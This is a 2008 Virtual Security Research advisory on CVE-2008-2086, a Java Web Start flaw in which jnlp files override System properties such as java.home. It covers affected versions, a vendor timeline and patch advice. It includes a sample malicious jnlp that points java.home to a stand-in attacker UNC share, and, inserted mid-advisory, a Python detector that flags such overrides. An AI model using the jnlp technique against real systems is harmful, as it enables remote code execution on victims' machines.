
JWS-props.txt

Posted Dec 4, 2008
Authored by Timothy D. Morgan | Site vsecurity.com

VSR identified a vulnerability in Java Web Start related to the execution of privileged applications. This flaw could allow an attacker to execute arbitrary code on a victim system if a user could be convinced to visit a malicious web site.

tags | advisory, java, web, arbitrary
advisories | CVE-2008-2086
SHA-256 | 8ca3bf4453e1d97e1df8cb1777248b40098c96ebee21fac715d1bd6643e51396

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory


- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: Java Web Start File Inclusion via System Properties Override
Release Date: 2008-12-03
Application: Sun Java Runtime Environment / Java Web Start
Versions: See below
Severity: High
Author: Timothy D. Morgan <tmorgan {a} vsecurity.com>
Vendor Status: Patch Released [3]
CVE Candidate: CVE-2008-2086
Reference: http://www.vsecurity.com/bulletins/advisories/2008/JWS-props.txt

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
- -------------------
- From [1]:

"Using Java Web Start technology, standalone Java software applications
can be deployed with a single click over the network. Java Web Start
ensures the most current version of the application will be deployed,
as well as the correct version of the Java Runtime Environment (JRE)."


Vulnerability Overview
- ----------------------
On March 27th, 2008, VSR identified a vulnerability in Java Web Start
related to the execution of privileged applications. This flaw could
allow an attacker to execute arbitrary code on a victim system if a user
could be convinced to visit a malicious web site.


Product Background
- ------------------
Java Web Start (JWS) applications are launched through specially
formatted XML files hosted on web sites with a "jnlp" file extension.
These files reference one or more "jar" files which are meant to be
downloaded and executed by client systems. JWS applications are run in
unprivileged mode by default but may be run with full user privileges if
the jnlp file requests this access. Privileged JWS applications must
have each jar file signed by the same trusted author in order to be
executed. However, jnlp files are not signed and may be hosted by
third-party web sites.

In addition to specifying application components, the jnlp specification
permits application authors to supply certain System properties which
may be retrieved by the application through the System.getProperty() and
System.getProperties() methods. Besides any user-supplied properties,
the Java VM also provides access to a number of sensitive runtime
settings through this interface.

More information on the jnlp format may be found in [2].


Vulnerability Details
- ---------------------
VSR discovered an unsafe behavior in the way properties are interpreted
when specified in jnlp files. In certain versions of the Java Runtime
Environment (JRE), values supplied through jnlp files override existing
system defaults. Thus far, VSR has verified that the following System
properties may be overridden:

java.home
java.ext.dirs
user.home

Of particular interest are the java.home and java.ext.dirs properties.
If an attacker could lure a victim to open a malicious jnlp file which
references a trusted (signed) application, it may be executed without
any confirmation by the user. However, as the application attempts to
load classes, it may trust the malicious java.home and/or java.ext.dirs
value. These paths could point to a malicious local or remote JRE or
extensions installation. It appears that under Windows, UNC network
paths may be used for the java.home value. It is not yet known whether
or not UNC paths may be used for java.ext.dirs.

During testing, VSR found that Java Cryptography Extension (JCE) classes
failed to load when java.home was set to an invalid path. However, by
setting this path to a network share which hosted a valid JRE
installation, the JCE classes loaded correctly. If such a network share
were hosted by the attacker, then arbitrary code could potentially be
loaded without restrictions, unbeknownst to the victim.

The following XML shows what a malicious jnlp file might look like.
Note that the malicious jnlp file would likely be very similar to the
ones users normally rely on, with certain properties overridden in the
resources section.

<jnlp spec="1.0+" codebase="http://trusted.example.org/" href="evil.jnlp">
  <information>
    <title>Trusted Application</title>
    <vendor>Trusted Vendor</vendor>
    <description>Trusted Application by Trusted Vendor</description>
    <homepage href="http://trusted.example.org/" />
    <offline-allowed />
  </information>
  <security><all-permissions /></security>
  <resources>
    <j2se version="1.5+" />
    <!-- Next line overrides the JRE's java.home System property -->
    <property name="java.home" value="\\evil.example.com\jre" />
    <jar href="signed-and-trusted-jce-dependent-library.jar" />
  </resources>
  <application-desc main-class="org.example.trusted.app.StartApp" />
</jnlp>

To fully exploit this specific attack vector, an attacker would need to
remotely or locally host a malicious version of classes used by a
trusted application and then lure a user into opening a malicious jnlp
file. A firewall installed between the attacker and victim could
mitigate this issue if the victim's machine were restricted from
accessing the hosted network share.

Note that certain JWS applications may trust other System properties,
such as user.home, and use them in ways which could be exploited in
application-specific variants of this attack.
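The property-override pattern described above can be spotted statically
before a jnlp file reaches a client, for instance at a web proxy or mail
gateway. The following Python script is an added example (it is not part
of the VSR advisory and not Sun's code): it parses a jnlp document,
reports any <property> element that sets one of the three System
properties the advisory verified as overridable, notes whether the value
is a UNC path or URL, and raises the verdict to "block" when the file
also requests <all-permissions />. The embedded sample jnlp is
constructed to mirror the advisory's snippet; the property list and the
block/review/allow verdicts are this example's own policy choices.

```python
# Added example (not from the VSR advisory): static triage of a JNLP file
# for the System-property override described in CVE-2008-2086.
import re
import xml.etree.ElementTree as ET

# The three JRE properties the advisory verified as overridable from a jnlp
# file.  A deployment may extend this set; that is a local policy choice.
SENSITIVE_PROPERTIES = {"java.home", "java.ext.dirs", "user.home"}

# Constructed sample, modelled on the advisory's malicious jnlp.
SAMPLE_JNLP = r"""<jnlp spec="1.0+" codebase="http://trusted.example.org/" href="evil.jnlp">
  <information>
    <title>Trusted Application</title>
    <vendor>Trusted Vendor</vendor>
  </information>
  <security><all-permissions /></security>
  <resources>
    <j2se version="1.5+" />
    <property name="java.home" value="\\evil.example.com\jre" />
    <property name="app.theme" value="dark" />
    <jar href="signed-and-trusted-jce-dependent-library.jar" />
  </resources>
  <application-desc main-class="org.example.trusted.app.StartApp" />
</jnlp>
"""

_URL_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def _local_name(tag):
    """Strip an XML namespace prefix ('{uri}property' -> 'property')."""
    return tag.rsplit("}", 1)[-1]


def is_remote_location(value):
    """True for UNC paths (two leading backslashes or slashes) and URLs."""
    return (value.startswith("\\\\") or value.startswith("//")
            or bool(_URL_RE.match(value)))


def audit_jnlp(xml_text):
    """Return whether the file asks for full permissions, every sensitive
    property override it carries, and an overall verdict."""
    root = ET.fromstring(xml_text)
    if _local_name(root.tag) != "jnlp":
        raise ValueError("root element is not <jnlp>")

    privileged = any(_local_name(e.tag) == "all-permissions" for e in root.iter())

    findings = []
    # Walk every element: <resources> blocks can be nested (e.g. per-OS).
    for elem in root.iter():
        if _local_name(elem.tag) != "property":
            continue
        name = elem.get("name", "")
        value = elem.get("value", "")
        if name not in SENSITIVE_PROPERTIES:
            continue  # application-defined properties are legitimate
        findings.append({
            "name": name,
            "value": value,
            "remote": is_remote_location(value),
        })

    if findings and privileged:
        verdict = "block"   # signed, trusted code would load classes from a spoofed JRE path
    elif findings:
        verdict = "review"  # sandboxed, but still overriding a JRE property
    else:
        verdict = "allow"
    return {"privileged": privileged, "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    result = audit_jnlp(SAMPLE_JNLP)
    print("all-permissions requested:", result["privileged"])
    for f in result["findings"]:
        where = "remote" if f["remote"] else "local"
        print(f"  override {f['name']} = {f['value']!r} ({where})")
    print("verdict:", result["verdict"])
```

The check is deliberately independent of who signed the jars: as the
advisory notes, the jars can be genuine and correctly signed while the
unsigned jnlp wrapping them is the attacker's.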


Versions Affected
- -----------------
During testing, VSR found the following JRE versions to be vulnerable:
* 1.5.0_15 on Windows
* 1.6.0 on Windows
* 1.5.0_13-b05-237 on Mac OS X (distributed by Apple)

Version 1.6.0_05 on Windows did not appear to be vulnerable. However,
Sun recommends that any installations with the following versions be
updated:

* JDK and JRE 6 Update 10 and earlier
* JDK and JRE 5.0 Update 16 and earlier
* SDK and JRE 1.4.2_18 and earlier

Sun reports that JRE 1.3.x is not affected, nor is JRE 6 Update 7 for
Intel Itanium. For more information on versions affected and updates,
see [3].


Vendor Response
- ---------------
The following timeline details Sun's response to the reported issue:

2008-03-28 Sun was provided a draft advisory.

2008-03-28 An initial response was received from Sun.

2008-04-11 Sun reported that the issue could not be reproduced.

2008-04-11 VSR provided Sun additional exploit details.

2008-04-29 Sun reported the issue was reproduced and assigned
an internal issue tracking number of CR 6694892.

2008-12-03 Sun Alert 244988 was released with an associated security
update.

Sun Alert 244988 may be obtained at:
http://sunsolve.sun.com/search/document.do?assetkey=1-66-244988-1


Recommendation
- --------------
Apply the JRE update as soon as possible. The issue is fixed in:

* JDK and JRE 6 Update 11 or later
* JDK and JRE 5.0 Update 17 or later
* SDK and JRE 1.4.2_19 or later

Review Sun Alert 244988 [3] for information on how to temporarily
disable Java Web Start to work around this issue.


Common Vulnerabilities and Exposures (CVE) Information
- ------------------------------------------------------
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2008-2086 to this issue. This is a candidate for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.


Acknowledgements
- ----------------
Thanks to George Gal for assistance in testing. VSR would like to thank
Sun for cooperating in the patch development process.


- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

References:

1. Java Web Start Technology
http://java.sun.com/products/javawebstart/

2. Java Web Start Architecture JNLP Specification & API Documentation
http://java.sun.com/products/javawebstart/download-spec.html

3. Sun Alert 244988
http://sunsolve.sun.com/search/document.do?assetkey=1-66-244988-1

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Copyright 2008 Virtual Security Research, LLC. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJN1kCQ1RSUNR+T+gRAl6TAJ9LmdTw8S4K3RMpgseiw/AkHUc81ACeK+pn
cXqD3636+kFoMIUNlNhVZUw=
=yv7u
-----END PGP SIGNATURE-----